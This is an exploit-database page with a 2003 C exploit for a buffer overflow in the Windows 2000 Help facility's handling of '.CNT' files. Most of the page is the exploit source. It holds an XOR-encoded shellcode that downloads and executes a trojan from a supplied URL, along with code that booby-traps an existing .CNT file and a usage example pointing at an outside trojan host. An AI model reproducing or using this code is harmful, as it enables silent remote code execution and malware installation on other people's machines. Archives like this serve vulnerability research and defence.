Vulners
Lucene search
Microsoft Windows Server 2000 - Help Facility '.CNT' File :Link Buffer Overflow
// source: https://www.securityfocus.com/bid/7102/info
The Microsoft Windows 2000 Help facility does not perform sufficient bounds checking on .cnt files. If a .cnt file containing an unusually long :Link URI was opened by the Windows Help facility, a buffer would be overrun, allowing the execution of arbitrary code.
/*************************************************
* s0h - Skin Of Humanity.
* http://s0h.cc
*
* Title : Win32hlp exploit for : ":LINK overflow"
* Date : Sunday, 9 March, 2003 1:00 AM
*
* -----------------------------------------------
*
* Archive : http://s0h.cc/exploit/s0h_Win32hlp.c
* Binary : http://s0h.cc/exploit/s0h_Win32hlp.exe
*
* -----------------------------------------------
* Discovered by ThreaT <[email protected]>.
* Coded by ThreaT <[email protected]>
* Hompage : http://s0h.cc/~threat/
*
* Winhlp32.exe exploit for ':LINK' overflow !
*
* -----------------------------------------------
*
* This exploit can trap a .CNT file (file with .-
* HLP files) with the arbitrary code who can dow-
* nload and execute a trojan without user ask.
*
* -----------------------------------------------
*
* Compiling : cl /nologo s0h_Win32hlp.c
* Usage : s0h_Win32hlp.exe <trojan> <CNT file> [offset]
* Eq : C:\>s0h_Win32hlp.exe http://www.chez.com/mvm/trojan.exe c:\WINNT\Help\mplayer2.cnt 4
*
* <trojan> = host to download the trojan (http:/-
* /blah.plof/trojan.exe).
*
* <CNT file> = The CNT file.
*
* [offset] = Optionnal. This one defined a numbe-
* r between 0 and 15 that can play with the retu-
* rn address. Generaly, you must used 4 if the .-
* HLP file is called by an application.
*
* -----------------------------------------------
* This exploit was tested on :
* - Windows 2000 PRO/SERVER (fr) SP0
* - Windows 2000 PRO/SERVER (fr) SP1
* - Windows 2000 PRO/SERVER (fr) SP2
*
************************************************/
#include <windows.h>
#define taille 270
#define VulnLen 650
int main (int argc, char *argv[]) {
HANDLE ExploitFile;
DWORD lpNumberOfBytesWritten, lpFileSizeHigh, FileSize;
int i,j, len, RetByte=0xE5;
char *file, *url;
unsigned char *Shellcode, *buffer,
RealGenericShellcode[] =
"\x68\x5E\x56\xC3\x90\x8B\xCC\xFF\xD1\x83\xC6\x0E\x90\x8B\xFE\xAC"
"\x34\x99\xAA\x84\xC0\x75\xF8"
"\x72\xeb\xf3\xa9\xc2\xfd\x12\x9a\x12\xd9\x95\x12\xd1\x95\x12\x58\x12\xc5\xbd\x91"
"\x12\xe9\xa9\x9a\xed\xbd\x9d\xa1\x87\xec\xd5\x12\xd9\x81\x12\xc1\xa5\x9a\x41\x12"
"\xc2\xe1\x9a\x41\x12\xea\x85\x9a\x69\xcf\x12\xea\xbd\x9a\x69\xcf\x12\xca\xb9\x9a"
"\x49\x12\xc2\x81\xd2\x12\xad\x03\x9a\x69\x9a\xed\xbd\x8d\x12\xaf\xa2\xed\xbd\x81"
"\xed\x93\xd2\xba\x42\xec\x73\xc1\xc1\xaa\x59\x5a\xc6\xaa\x50\xff\x12\x95\xc6\xc6"
"\x12\xa5\x16\x14\x9d\x9e\x5a\x12\x81\x12\x5a\xa2\x58\xec\x04\x5a\x72\xe5\xaa\x42"
"\xf1\xe0\xdc\xe1\xd8\xf3\x93\xf3\xd2\xca\x71\xe2\x66\x66\x66\xaa\x50\xc8\xf1\xec"
"\xeb\xf5\xf4\xff\x5e\xdd\xbd\x9d\xf6\xf7\x12\x75\xc8\xc8\xcc\x66\x49\xf1\xf0\xf5"
"\xfc\xd8\xf3\x97\xf3\xeb\xf3\x9b\x71\xcc\x66\x66\x66\xaa\x42\xca\xf1\xf8\xb7\xfc"
"\xe1\x5f\xdd\xbd\x9d\xfc\x12\x55\xca\xca\xc8\x66\xec\x81\xca\x66\x49\xaa\x42\xf1"
"\xf0\xf7\xdc\xe1\xf3\x98\xf3\xd2\xca\x71\xb5\x66\x66\x66\x14\xd5\xbd\x89\xf3\x98"
"\xc8\x66\x49\xaa\x42\xf1\xe1\xf0\xed\xc9\xf3\x98\xf3\xd2\xca\x71\x8b\x66\x66\x66"
"\x66\x49\x71\xe6\x66\x66\x66";
printf (" * ***************************************************** *\n"
" * s0h - Skin of humanity *\n"
" * http://s0h.cc/ *\n"
" * ***************************************************** *\n"
" Win32hlp exploit for : \":LINK overflow\" *\n"
" * ***************************************************** *\n"
" * Discovered by ThreaT <[email protected]>. *\n"
" * Coded by ThreaT <[email protected]> *\n"
" * Hompage : http://s0h.cc/~threat/ *\n"
" * Archive : http://s0h.cc/exploit/s0h_Win32hlp.c *\n"
" * ***************************************************** *\n"
);
if (argc < 3)
{
printf(
" * ***************************************************** *\n"
" * Usage : s0h_Win32hlp.exe <trojan> <CNT file> [offset] *\n"
" * *\n"
" * <trojan> = host to download the trojan (http:/- *\n"
" * /blah.plof/trojan.exe). *\n"
" * *\n"
" * <CNT file> = The CNT file. *\n"
" * *\n"
" * [offset] = Optionnal. This one defined a number betw- *\n"
" * een 0 and 15 that can play with the return address. - *\n"
" * Generaly, you must used 4 if the .HLP file is called *\n"
" * by an application. *\n"
" * ***************************************************** *\n"
);
ExitProcess (1);
}
if (argv[3]) RetByte = atoi (argv[3]) + 0xE0;
len = taille + strlen (argv[1]) + 2 + 4;
url = (char *) malloc (strlen (argv[1]));
strcpy (url, argv[1]);
/*
* Create the final shellcode
*/
Shellcode = (unsigned char *) malloc (len);
// encrypt the URL
for (i=0;i<strlen (argv[1]); argv[1][i++]^=0x99);
// inject the RealGenericShellcode in the shellcode buffer
for (i=0;i<taille; Shellcode[i]=RealGenericShellcode[i++]);
// append crypted URL to the shellcode buffer
for (i,j=0;i<len - 1;Shellcode[i++]=argv[1][j++]);
Shellcode[len-6]=0x99; // URL delimitation
Shellcode[len-5]=0x2E; // fuck the winhlp32.exe parser
// append the RET ADDR
// Play with this bytes if the xploit don't work
Shellcode[len-4]=0x30;
Shellcode[len-3]=RetByte;
Shellcode[len-2]=0x06;
Shellcode[len-1]=0x00;
/* Now, we make a vuln string for our exploit */
buffer = (unsigned char *) malloc (VulnLen);
memset (buffer,0,VulnLen);
lstrcpy (buffer,":Link ");
for (i=6; i < VulnLen - len; buffer[i++] = (char)0x90);
for (i,j=0; i < VulnLen; buffer[i++] = Shellcode[j++]);
/* Trap the CNT file specified with the vuln string */
ExploitFile = CreateFile (argv[2],GENERIC_READ+GENERIC_WRITE,
FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if ( ExploitFile == INVALID_HANDLE_VALUE) {
printf ("Error : cannot open cnt file '%s'\n",argv[2]);
ExitProcess (1);
}
FileSize = GetFileSize(ExploitFile, &lpFileSizeHigh);
FileSize += lpFileSizeHigh*MAXDWORD;
file = (char *)LocalAlloc (LPTR, FileSize + 2);
file[0] = 0x0d;
file[1] = 0x0a;
file += 2;
ReadFile(ExploitFile,file,FileSize,&lpNumberOfBytesWritten,NULL);
SetFilePointer (ExploitFile,0,NULL,FILE_BEGIN);
WriteFile (ExploitFile,buffer,VulnLen,&lpNumberOfBytesWritten,NULL);
file -= 2;
WriteFile (ExploitFile,file,FileSize+2,&lpNumberOfBytesWritten,NULL);
CloseHandle(ExploitFile);
printf (
" * *******************************************************\n"
" * The file is now traped and ready to download and exe- *\n"
" * cute : *\n"
" * File : %s\n"
" * At : %s\n"
" * *******************************************************\n"
,argv[2],url);
if (RetByte != 0xE5)
printf (
" * *******************************************************\n"
" * You have specified this address : 0x0006%x30 *\n"
" * The abitrary will loaded since an application. *\n"
" * *******************************************************\n"
,RetByte);
return 0;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Mar 2003 00:00Current
7.4High risk
Vulners AI Score7.4